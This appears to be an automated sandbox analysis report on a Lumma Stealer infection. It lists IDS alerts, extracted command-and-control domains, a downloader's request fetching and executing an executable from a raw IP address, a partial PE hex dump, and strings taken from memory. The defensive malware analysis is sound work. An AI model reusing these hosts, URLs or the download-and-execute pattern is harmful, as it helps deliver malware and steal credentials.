    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebx, eax3_2_02145D17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebp, eax3_2_02145D17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_02165D57
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0216BD67
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0215AD91
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0215BD88
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0216EDC6

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.9:62262 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.9:54870 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.9:58556 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.9:51884 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.9:63189 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.9:52070 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.9:62668 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.9:57651 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.9:63354 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.9:50759 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:63355 -> 104.102.49.254:443
    Source: Malware configuration extractorURLs: crowdwarek.shop
    Source: Malware configuration extractorURLs: skidjazzyric.click
    Source: Malware configuration extractorURLs: apporholis.shop
    Source: Malware configuration extractorURLs: versersleep.shop
    Source: Malware configuration extractorURLs: soundtappysk.shop
    Source: Malware configuration extractorURLs: femalsabler.shop
    Source: Malware configuration extractorURLs: chipdonkeruz.shop
    Source: Malware configuration extractorURLs: robinsharez.shop
    Source: Malware configuration extractorURLs: handscreamny.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 12 Jan 2025 16:45:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 12 Jan 2025 16:45:01 GMTETag: "62a00-62b850c908464"Accept-Ranges: bytesContent-Length: 403968Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 69 04 00 28 00 00 00 00 80 0b 00 10 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 34 04 00 00 10 00 00 00 36 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 56 22 00 00 00 50 04 00 00 24 00 00 00 3a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 7c 06 00 00 80 04 00 00 16 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 73 75 00 00 00 e5 53 00 00 00 00 0b 00 00 48 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 75 77 61 76 00 00 5a 01 00 00 00 60 0b 00 00 02 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 78 61 68 00 00 0c 00 00 00 00 70 0b 00 00 02 00 00 00 be 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 69 01 00 00 80 0b 00 00 6a 01 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49708 -> 176.113.115.19:80
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:63355 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49707 -> 104.21.56.70:443
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029EA
    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=64368e4dcc7c7ac93572902e; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKee equals www.youtube.com (Youtube)
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=64368e4dcc7c7ac93572902e; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 12 Jan 2025 16:45:33 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
    Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
    Source: global trafficDNS traffic detected: DNS query: soundtappysk.shop
    Source: global trafficDNS traffic detected: DNS query: femalsabler.shop
    Source: global trafficDNS traffic detected: DNS query: apporholis.shop
    Source: global trafficDNS traffic detected: DNS query: crowdwarek.shop
    Source: global trafficDNS traffic detected: DNS query: versersleep.shop
    Source: global trafficDNS traffic detected: DNS query: chipdonkeruz.shop
    Source: global trafficDNS traffic detected: DNS query: handscreamny.shop
    Source: global trafficDNS traffic detected: DNS query: robinsharez.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: g3toRYa6JE.exe, g3toRYa6JE.exe, 00000000.00000002.3872617941.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
    Source: g3toRYa6JE.exe, 00000000.00000002.3872617941.00000000006D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe$KU
    Source: g3toRYa6JE.exe, 00000000.00000002.3872617941.00000000006D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe(Ka
    Source: g3toRYa6JE.exe, 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
